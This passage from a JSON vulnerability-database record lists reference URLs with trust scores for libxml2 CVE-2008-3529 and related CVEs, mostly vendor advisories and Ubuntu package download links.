            "trust": 1.8,
            "url": "http://www.vupen.com/english/advisories/2009/1621"
          },
          {
            "trust": 1.8,
            "url": "http://lists.apple.com/archives/security-announce/2009/may/msg00000.html"
          },
          {
            "trust": 1.8,
            "url": "http://lists.apple.com/archives/security-announce/2009/jun/msg00002.html"
          },
          {
            "trust": 1.8,
            "url": "http://lists.apple.com/archives/security-announce/2009/jun/msg00005.html"
          },
          {
            "trust": 1.8,
            "url": "http://www.debian.org/security/2008/dsa-1654"
          },
          {
            "trust": 1.8,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2008:192"
          },
          {
            "trust": 1.8,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0884.html"
          },
          {
            "trust": 1.8,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0886.html"
          },
          {
            "trust": 1.8,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2008-09/msg00004.html"
          },
          {
            "trust": 1.8,
            "url": "http://www.us-cert.gov/cas/techalerts/ta09-133a.html"
          },
          {
            "trust": 1.8,
            "url": "http://www.ubuntu.com/usn/usn-815-1"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-21-126356-03-1"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-21-141243-01-1"
          },
          {
            "trust": 1.8,
            "url": "http://support.apple.com/kb/ht3549"
          },
          {
            "trust": 1.8,
            "url": "http://support.apple.com/kb/ht3550"
          },
          {
            "trust": 1.8,
            "url": "http://support.apple.com/kb/ht3613"
          },
          {
            "trust": 1.8,
            "url": "http://support.apple.com/kb/ht3639"
          },
          {
            "trust": 1.8,
            "url": "http://wiki.rpath.com/advisories:rpsa-2008-0325"
          },
          {
            "trust": 1.8,
            "url": "http://xmlsoft.org/news.html"
          },
          {
            "trust": 1.8,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=461015"
          },
          {
            "trust": 1.8,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/45085"
          },
          {
            "trust": 1.8,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11760"
          },
          {
            "trust": 1.8,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a6103"
          },
          {
            "trust": 1.0,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3529"
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/45085"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-3529"
          },
          {
            "trust": 0.8,
            "url": "http://www.vupen.com/english/advisories/2008/2419"
          },
          {
            "trust": 0.6,
            "url": "https://access.redhat.com/security/cve/cve-2008-3529"
          },
          {
            "trust": 0.6,
            "url": "https://access.redhat.com/errata/rhsa-2008:0886"
          },
          {
            "trust": 0.6,
            "url": "https://access.redhat.com/errata/rhsa-2008:0884"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-3529"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-266428-1"
          },
          {
            "trust": 0.3,
            "url": "http://www.xmlsoft.org/"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=834296"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-247346-1"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-3281"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3281"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=498768"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=16643"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/8798/"
          },
          {
            "trust": 0.1,
            "url": "http://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-4225"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4225"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4226"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-4409"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-4226"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4409"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.24.dfsg-1ubuntu1.5_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_amd64.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_amd64.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.24.dfsg-1ubuntu1.5_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_lpia.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_powerpc.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_powerpc.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_lpia.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_powerpc.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-4ubuntu1.2_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_i386.udeb"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2414"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_lpia.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_sparc.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_sparc.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-5ubuntu4.2_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2416"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_i386.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_amd64.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.31.dfsg-2ubuntu1.4_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_i386.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_sparc.udeb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_amd64.deb"
          },
          {
            "trust": 0.1,
